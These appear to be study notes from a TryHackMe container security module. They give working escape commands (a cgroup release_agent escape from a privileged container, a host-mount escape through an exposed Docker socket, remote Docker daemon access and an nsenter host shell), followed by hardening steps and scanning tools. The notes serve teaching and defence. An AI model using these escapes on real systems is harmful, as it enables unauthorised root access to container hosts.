Container Security

Notes from the 'Container Security' module of TryHackMe

Link to the module

Container Vulnerabilities

Privileged Containers

Docker containers can be run in two modes -

  • User mode - interacts with the Host Operating System through Docker Engine

  • Privileged - interacts directly with the Host OS

If a container is running with privileged access to the OS, commands can effectively be executed as root on the host. You can view capabilities of the container by running capsh --print.

Given below is an exploit on a privileged container using the mount syscall -

The blog explaining the exploit in detail

Steps involved in the exploit -

  1. Create a cgroup so that the Linux kernel can be used to write and execute the exploit.

    The kernel uses cgroups to manage processes on the OS.

    Since a privileged container can manage cgroups as root on the host, a cgroup hierarchy can be mounted at /tmp/cgrp in the container.

  2. For the exploit to execute, the kernel has to be told to run it. Writing 1 to /tmp/cgrp/x/notify_on_release tells the kernel to run the release agent once the last process in the cgroup exits.

  3. Find out where the container's files are stored on the host and store it as a variable.

  4. Write the location of the exploit on the host system into release_agent so that the kernel executes the exploit once the cgroup is released.

  5. Start the exploit file with a shell shebang so that the host runs it as a shell script.

  6. Execute a command, cat /home/user1/flag.txt > $host_path/flag.txt, to print the contents of flag.txt into a file on the container.

  7. Make the exploit executable.

  8. Start a process that writes its own PID into /tmp/cgrp/x/cgroup.procs so that, once the process exits and the cgroup is released, the exploit is executed.

Commands to execute
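A minimal sketch of the eight steps above, assuming a privileged container on a host that uses cgroup v1 with the rdma controller available. The function names overlay_host_path and cgroup_escape are illustrative, and nothing runs until cgroup_escape is called.

```shell
#!/bin/sh
# Hypothetical helper: extract the overlay "upperdir" (where the container's
# files live on the host) from a mount table. Defaults to /etc/mtab.
overlay_host_path() {
    sed -n 's/.*upperdir=\([^,]*\).*/\1/p' "${1:-/etc/mtab}" | head -n 1
}

# Hypothetical wrapper around the steps listed above.
cgroup_escape() {
    # 1. Mount a cgroup hierarchy (rdma controller assumed) and create a child cgroup "x".
    mkdir -p /tmp/cgrp || return 1
    mount -t cgroup -o rdma cgroup /tmp/cgrp || return 1
    mkdir -p /tmp/cgrp/x || return 1

    # 2. Ask the kernel to run the release agent when "x" becomes empty.
    echo 1 > /tmp/cgrp/x/notify_on_release

    # 3. Find where the container's files are stored on the host.
    host_path=$(overlay_host_path)

    # 4. Register the exploit (as seen from the host) as the release agent.
    echo "$host_path/exploit" > /tmp/cgrp/release_agent

    # 5 and 6. Write the exploit: a shell script that copies the flag into the container.
    echo '#!/bin/sh' > /exploit
    echo "cat /home/user1/flag.txt > $host_path/flag.txt" >> /exploit

    # 7. Make the exploit executable.
    chmod a+x /exploit

    # 8. Put a short-lived process into "x"; when it exits, the agent fires.
    sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
}
```

After calling cgroup_escape inside the container, the flag should appear at /flag.txt in the container, since that path maps to $host_path/flag.txt on the host.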

Escaping via Exposed Docker Daemon

Commands such as docker run reach the Docker Engine through a socket, which is a Unix socket unless the command targets a remote Docker host. Unix sockets use filesystem permissions, meaning that you have to be a member of the docker group (or root) to run Docker commands.

When the socket is exposed to a container, it is mounted in the container as a docker.sock file. You can search for the file using the find command. On Ubuntu systems, it is located in the /var/run directory.

You can use the Docker daemon to create a new container and mount the host's filesystem into the container to indirectly gain access to the host's filesystem. This can be achieved by running the following command -
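A sketch of the search and the escape, assuming the docker client is available inside the compromised container. The function names are illustrative, and alpine is an assumed image (any image that ships chroot and sh would do).

```shell
#!/bin/sh
# Hypothetical helpers; nothing runs until a function is called.

# Locate a Docker socket that has been mounted into the container.
find_docker_socket() {
    find / -name docker.sock 2>/dev/null
}

# Start a new container with the host's / mounted at /mnt, then chroot into it.
# --rm removes the helper container once the shell exits.
socket_escape() {
    docker run -v /:/mnt --rm -it alpine chroot /mnt sh
}
```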

The command does the following -

  1. Starts a new container with the host's file system mounted to /mnt in the new container

  2. Runs the container interactively using -it

  3. Changes the root directory of the container to /mnt

  4. Tells the container to run sh to gain a shell and execute commands in the container

Remote Code Execution via Exposed Docker Daemon

Docker can also use TCP sockets for IPC. It can be remotely administered using tools such as Portainer or Jenkins to deploy containers for testing code. When configured for remote access, Docker Engine listens on a TCP port (2375 by default). This makes it easy to reach the daemon remotely, but it is difficult to do securely. You can find out whether a device has Docker remotely accessible by using nmap -

An exposed Docker daemon can be interacted with by using curl.

The docker client can also send commands to the target. Add -H to point it at the target. You can then run various commands like network, images, exec, run.
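The nmap, curl and docker -H checks described above could look roughly like this. The function names are illustrative and the target address is a placeholder passed as the first argument; /version is a Docker Engine API endpoint that returns daemon details as JSON.

```shell
#!/bin/sh
# Hypothetical helpers; $1 is the address of the remote host.

# Check whether the Docker TCP port is open and identify the service.
scan_docker_port() {
    nmap -sV -p 2375 "$1"
}

# Query the Docker Engine API directly over HTTP.
docker_api_version() {
    curl -s "http://$1:2375/version"
}

# Point the docker client at the remote daemon and list its containers.
remote_docker_ps() {
    docker -H "tcp://$1:2375" ps
}
```

The same -H form works with other subcommands, for example docker -H tcp://TARGET:2375 images.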

Abusing Namespaces

Sometimes, containers will share the same namespace as the host OS for communication between the container and host. This can be abused by using the nsenter command. The command allows you to execute or start processes and place them within the same namespace as another process.

You can abuse the fact that the container can see the /sbin/init process on the host to launch new commands such as a bash shell on the host. This can be done using the following command -
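A sketch of the nsenter invocation, assuming the container shares the host's PID namespace and runs with enough privileges to enter it. The wrapper name host_shell is illustrative.

```shell
#!/bin/sh
# Hypothetical wrapper; nothing runs until host_shell is called.
# Enters the mount, UTS, IPC and network namespaces of PID 1 and starts bash there.
host_shell() {
    nsenter --target 1 --mount --uts --ipc --net /bin/bash
}
```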

The command does the following -

  1. Sets the target (--target 1) to the namespaces of the init process (PID 1), which runs as root on the host

  2. Enters the mount namespace of the target process (--mount); if no file is specified, the mount namespace of the target process is used.

  3. Allows you to share the same UTS (Unix Timesharing System) namespace as the target process (--uts), meaning the same hostname is used; mismatching hostnames can cause connection issues.

  4. Enters the IPC (Inter-process communication) namespace of the process (--ipc), which is important as it means that memory can be shared

  5. Enters the network namespace (--net) to allow you to interact with network-related features of the system; for example, the network interfaces can be used to open a new connection like a stable reverse shell on the host.

bash will then execute in the same namespaces (and with the same privileges) as the host's init process.


Container Hardening

Protecting the Docker Daemon

Make sure to use secure communication and authentication methods to prevent unauthorised access to the Docker daemon.

SSH

You can use SSH authentication to interact with other devices running Docker. Docker uses contexts which can be thought of as profiles. Profiles allow developers to save and swap between configurations for other devices. You must have SSH access to the remote device and the user account on the remote device must have permission to execute Docker commands.

Use the following command to create a Docker context on your device -
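A sketch of creating a context over SSH. The user, host and context name are placeholders supplied as arguments, and the description text is an arbitrary example.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = SSH user, $2 = remote host, $3 = context name.
create_remote_context() {
    docker context create \
        --docker "host=ssh://$1@$2" \
        --description "Development Environment" \
        "$3"
}
```

For example, create_remote_context myuser remotehost development-environment-host.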

Run the following command to switch to the created context -
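Switching is a single subcommand; the wrapper below is illustrative and takes the context name as its argument. Passing default switches back to the local daemon.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = name of an existing context.
use_context() {
    docker context use "$1"
}
```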

TLS Encryption

The Docker daemon can also be interacted with over HTTP/S. When configured in TLS mode, Docker only accepts remote commands from clients whose certificates have been signed by a certificate authority trusted by the device you wish to execute Docker commands on.

To configure TLS mode run the following command on the server that you are issuing commands to -
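A sketch of starting the daemon in TLS mode, assuming the CA certificate and the server's certificate and key already exist. The file names are placeholders, and 2376 is the port conventionally used for TLS.

```shell
#!/bin/sh
# Hypothetical wrapper; the .pem file names are placeholders.
start_tls_daemon() {
    dockerd --tlsverify \
        --tlscacert=myca.pem \
        --tlscert=myserver-cert.pem \
        --tlskey=myserver-key.pem \
        -H=0.0.0.0:2376
}
```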

Run the following command on the client that you are issuing commands from -
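The client side mirrors the server flags. In this sketch the certificate file names are placeholders, the server address is passed as the first argument, and info is just one example of a subcommand to run.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = address of the TLS-enabled Docker host.
tls_client_info() {
    docker --tlsverify \
        --tlscacert=myca.pem \
        --tlscert=client-cert.pem \
        --tlskey=client-key.pem \
        -H="$1:2376" info
}
```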

Implementing Control Groups

Control groups (or cgroups) are a feature of the Linux kernel that facilitates restricting and prioritising the amount of system resources a process can utilise. They improve system stability and allow administrators to track the use of system resources better.

For Docker, implementing cgroups helps achieve isolation and stability. This behaviour is not enabled by default and must be enabled when starting a container. Some examples of setting limits to resources for a container -
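Two illustrative limits, one CPU core and 20 MB of memory. The function names and values are examples only; the image name is passed as the first argument.

```shell
#!/bin/sh
# Hypothetical wrappers: $1 = image to run.

# Limit the container to one CPU core.
run_with_cpu_limit() {
    docker run -it --cpus="1" "$1"
}

# Limit the container to 20 MB of memory.
run_with_memory_limit() {
    docker run -it --memory="20m" "$1"
}
```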

Use the following command to update the setting once the container is running -
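A sketch using docker update; the 40 MB value and the wrapper name are examples, and the container name is passed as the first argument.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = name or ID of a running container.
raise_memory_limit() {
    docker update --memory="40m" "$1"
}
```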

You can view information about a container using the following command -
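Plain docker inspect prints the full JSON description of the container. The sketch below narrows the output to the memory and CPU limits using a format template; the wrapper name is illustrative.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = name or ID of the container.
# HostConfig.Memory is in bytes; HostConfig.NanoCpus is in billionths of a CPU.
show_limits() {
    docker inspect \
        --format 'memory={{.HostConfig.Memory}} nano_cpus={{.HostConfig.NanoCpus}}' \
        "$1"
}
```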

If a resource limit is shown as 0, no limit has been set for that resource.

Read more about cgroups at -

Preventing "Over-Privileged" Containers

Capabilities are a security feature of Linux that determine what processes can and cannot do on a granular level. They allow you to fine-tune what privileges a process has. Some capabilities are -

  • CAP_NET_BIND_SERVICE - allows services to bind to ports, specifically those under 1024, which usually requires root privileges

  • CAP_SYS_ADMIN - provides a broad set of admin privileges such as mounting/unmounting file systems and setting the hostname (network configuration and reboots/shutdowns are governed by the separate CAP_NET_ADMIN and CAP_SYS_BOOT capabilities)

  • CAP_SYS_RESOURCE - allows a process to modify the maximum limit of resources available

Privileged containers have full root access, so it is better to assign capabilities to containers individually instead of running containers with the --privileged flag. The following command drops all capabilities and then adds only the NET_BIND_SERVICE capability to the webserver container -
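A sketch of the drop-all-then-add pattern; the wrapper name is illustrative and the web server image is passed as the first argument.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = web server image.
# Drops every capability, then grants only the one needed to bind to ports below 1024.
run_webserver_min_caps() {
    docker run -it --rm --cap-drop=ALL --cap-add=NET_BIND_SERVICE "$1"
}
```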

You can determine what capabilities are assigned to a process by using the capsh --print command. Read more about capabilities at -

Seccomp and AppArmor

Seccomp is an important security feature of Linux that restricts the actions a program can perform. It allows the user to create and enforce a list of rules for the actions (system calls) an application can make. For example, it can allow the application to make a system call to read a file but not allow it to make a system call to open a network connection. This reduces an attacker's ability to execute malicious commands whilst maintaining the application's functionality.

An example Seccomp profile for a web server that allows files to be read and written to but does not allow execution (execve, execveat) -
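A sketch of such a profile, written to disk from the shell. It allows every system call by default and returns an error for execve and execveat; the function name, output path and architecture list are assumptions. A real profile would likely need tuning, since the container's entrypoint is itself started with execve.

```shell
#!/bin/sh
# Hypothetical helper: $1 = path of the profile file to create.
write_seccomp_profile() {
    cat > "$1" <<'EOF'
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
  "syscalls": [
    {
      "names": ["execve", "execveat"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}
EOF
}
```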

Apply a profile to a container -
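A profile is passed with --security-opt when the container starts. In this sketch the wrapper name is illustrative, the first argument is the path to the profile and the second is the image.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = path to the seccomp profile, $2 = image to run.
run_with_seccomp() {
    docker run --rm -it --security-opt "seccomp=$1" "$2"
}
```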

Resources -

Reviewing Docker Images

You should analyse the code for Dockerfiles before using them to check for vulnerabilities or malicious actions. You can use Dive for this. It is a tool to reverse engineer Docker images by inspecting what is executed and changed at each layer during the build process.

Compliance and Benchmarking

Compliance Frameworks

The following frameworks can be used for compliance with regards to containers -

Benchmarking Tools

The following tools can be used to benchmark containers -

  • CIS Docker Benchmark

    • This tool can assess a container's compliance with the CIS Docker Benchmark framework.

  • OpenSCAP

    • This tool can assess a container's compliance with multiple frameworks, including CIS Docker Benchmark, NIST SP 800-190 and more.

  • Docker Scout

    • This tool is a cloud-based service provided by Docker itself that scans Docker images and libraries for vulnerabilities. This tool lists the vulnerabilities present and provides steps to resolve these.

  • Grype

    • It is a modern and fast vulnerability scanner for container images and filesystems.

Using Docker Scout to scan an nginx image for known vulnerabilities -
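A sketch using the cves subcommand, assuming the Docker Scout CLI plugin is installed. The wrapper name is illustrative and the image reference is passed as the first argument.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = image reference, e.g. nginx:latest.
scout_scan() {
    docker scout cves "$1"
}
```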

Using Grype to scan a Docker image for vulnerabilities -
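A sketch of an image scan. The wrapper name is illustrative; --scope all-layers asks Grype to consider every layer rather than only the final squashed filesystem.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = image reference, e.g. nginx:latest.
grype_scan_image() {
    grype "$1" --scope all-layers
}
```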

Using Grype to scan an exported image archive (exported using docker image save) -
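A sketch that saves an image to a tar archive and then scans the archive. The wrapper name and paths are illustrative.

```shell
#!/bin/sh
# Hypothetical wrapper: $1 = image reference, $2 = path of the tar archive to create.
scan_saved_image() {
    docker image save -o "$2" "$1" && grype "$2"
}
```

For example, scan_saved_image nginx:latest ./nginx.tar.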
